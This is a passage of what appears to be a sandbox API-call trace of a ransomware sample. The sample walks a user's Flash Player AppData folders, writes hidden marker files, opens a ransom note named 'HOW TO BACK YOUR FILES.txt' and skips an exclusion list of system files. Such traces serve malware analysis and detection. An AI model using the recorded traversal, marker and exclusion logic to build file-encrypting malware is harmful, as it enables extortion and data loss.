lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\.BFC0E91B00AE8A0620D3" [0053.655] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.657] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.659] FlushFileBuffers (hFile=0x27c) returned 1 [0053.660] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.660] CloseHandle (hObject=0x27c) returned 1 [0053.661] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned 70 [0053.661] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.661] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53ed8d1, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f0003, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe94f19ce, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0053.661] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.661] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.661] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.661] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.661] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53ed8d1, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f0003, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe94f19ce, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.661] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.661] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.661] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.661] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.661] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.661] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe94f19ce, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe94f19ce, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe94f19ce, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.661] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.661] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.661] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53eec6a, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f271c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53f271c, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="support", cAlternateFileName="")) returned 1 [0053.661] lstrcmpiW (lpString1="support", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.661] lstrcmpiW (lpString1="support", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.661] lstrcmpiW (lpString1="support", lpString2="Rabbit4444.exe") returned 1 [0053.662] lstrcmpiW (lpString1="support", lpString2=".") returned 1 [0053.662] lstrcmpiW (lpString1="support", lpString2="..") returned 1 [0053.662] lstrcmpiW (lpString1="support", lpString2="windows") returned -1 [0053.662] lstrcmpiW (lpString1="support", lpString2="bootmgr") returned 1 [0053.662] lstrcmpiW (lpString1="support", lpString2="pagefile.sys") returned 1 [0053.662] lstrcmpiW (lpString1="support", lpString2="boot") returned 1 [0053.662] lstrcmpiW (lpString1="support", lpString2="ids.txt") returned 1 [0053.662] lstrcmpiW (lpString1="support", lpString2="NTUSER.DAT") returned 1 [0053.662] lstrcpyW (in: lpString1=0x130ebc6, lpString2="support" | out: lpString1="support") returned="support" [0053.662] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0053.662] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9e) returned 0xf11e8 [0053.662] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf63b0 [0053.662] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53eec6a, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f271c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53f271c, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="support", cAlternateFileName="")) returned 0 [0053.662] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0053.662] lstrcpyW (in: lpString1=0x130ebc6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.662] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.664] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.664] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.665] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.665] CloseHandle (hObject=0x278) returned 1 [0053.665] CloseHandle (hObject=0x27c) returned 1 [0053.665] GetCurrentThreadId () returned 0xd98 [0053.665] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0053.665] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" [0053.665] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf11e8 | out: hHeap=0xe0000) returned 1 [0053.665] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0053.665] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" [0053.665] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\" [0053.665] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\.BFC0E91B00AE8A0620D3" [0053.665] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.666] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.669] FlushFileBuffers (hFile=0x27c) returned 1 [0053.670] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.670] CloseHandle (hObject=0x27c) returned 1 [0053.670] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned 78 [0053.670] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.670] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53eec6a, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f271c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe94f19ce, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0053.671] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.671] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.671] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.671] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.671] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53eec6a, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f271c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe94f19ce, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.671] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.671] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.671] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.704] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.704] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.704] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe94f19ce, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe94f19ce, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe94f19ce, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.704] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.704] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.704] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53f271c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f4df4, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53f4df4, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="flashplayer", cAlternateFileName="FLASHP~1")) returned 1 [0053.704] lstrcmpiW (lpString1="flashplayer", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.704] lstrcmpiW (lpString1="flashplayer", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.704] lstrcmpiW (lpString1="flashplayer", lpString2="Rabbit4444.exe") returned -1 [0053.704] lstrcmpiW (lpString1="flashplayer", lpString2=".") returned 1 [0053.704] lstrcmpiW (lpString1="flashplayer", lpString2="..") returned 1 [0053.704] lstrcmpiW (lpString1="flashplayer", lpString2="windows") returned -1 [0053.704] lstrcmpiW (lpString1="flashplayer", lpString2="bootmgr") returned 1 [0053.704] lstrcmpiW (lpString1="flashplayer", lpString2="pagefile.sys") returned -1 [0053.705] lstrcmpiW (lpString1="flashplayer", lpString2="boot") returned 1 [0053.705] lstrcmpiW (lpString1="flashplayer", lpString2="ids.txt") returned -1 [0053.705] lstrcmpiW (lpString1="flashplayer", lpString2="NTUSER.DAT") returned -1 [0053.705] lstrcpyW (in: lpString1=0x130ebd6, lpString2="flashplayer" | out: lpString1="flashplayer") returned="flashplayer" [0053.705] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0053.705] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x10a2f0 [0053.705] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf63b0 [0053.705] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53f271c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f4df4, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53f4df4, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="flashplayer", cAlternateFileName="FLASHP~1")) returned 0 [0053.705] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0053.705] lstrcpyW (in: lpString1=0x130ebd6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.705] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.707] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.707] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.707] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.707] CloseHandle (hObject=0x278) returned 1 [0053.707] CloseHandle (hObject=0x27c) returned 1 [0053.707] GetCurrentThreadId () returned 0xd98 [0053.707] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0053.707] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0053.707] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10a2f0 | out: hHeap=0xe0000) returned 1 [0053.707] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0053.707] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0053.707] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\" [0053.707] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\.BFC0E91B00AE8A0620D3" [0053.707] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.708] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.711] FlushFileBuffers (hFile=0x27c) returned 1 [0053.712] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.712] CloseHandle (hObject=0x27c) returned 1 [0053.712] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned 90 [0053.712] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.712] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53f271c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f4df4, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe95643fb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0053.713] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.713] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.713] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.713] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.713] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53f271c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f4df4, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe95643fb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.713] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.713] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.713] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.713] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.713] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.713] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe95643fb, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe95643fb, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe95643fb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.713] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.713] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.713] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53f4df4, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x146557ae, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x146557ae, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sys", cAlternateFileName="")) returned 1 [0053.713] lstrcmpiW (lpString1="sys", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.713] lstrcmpiW (lpString1="sys", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.713] lstrcmpiW (lpString1="sys", lpString2="Rabbit4444.exe") returned 1 [0053.713] lstrcmpiW (lpString1="sys", lpString2=".") returned 1 [0053.713] lstrcmpiW (lpString1="sys", lpString2="..") returned 1 [0053.713] lstrcmpiW (lpString1="sys", lpString2="windows") returned -1 [0053.713] lstrcmpiW (lpString1="sys", lpString2="bootmgr") returned 1 [0053.713] lstrcmpiW (lpString1="sys", lpString2="pagefile.sys") returned 1 [0053.713] lstrcmpiW (lpString1="sys", lpString2="boot") returned 1 [0053.713] lstrcmpiW (lpString1="sys", lpString2="ids.txt") returned 1 [0053.713] lstrcmpiW (lpString1="sys", lpString2="NTUSER.DAT") returned 1 [0053.713] lstrcpyW (in: lpString1=0x130ebee, lpString2="sys" | out: lpString1="sys") returned="sys" [0053.713] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6368 [0053.713] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0x10a2f0 [0053.713] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6370 | out: ListHead=0xf68b0, ListEntry=0xf6370) returned 0xf63b0 [0053.713] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53f4df4, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x146557ae, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x146557ae, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sys", cAlternateFileName="")) returned 0 [0053.713] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0053.714] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.714] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.723] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.724] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, 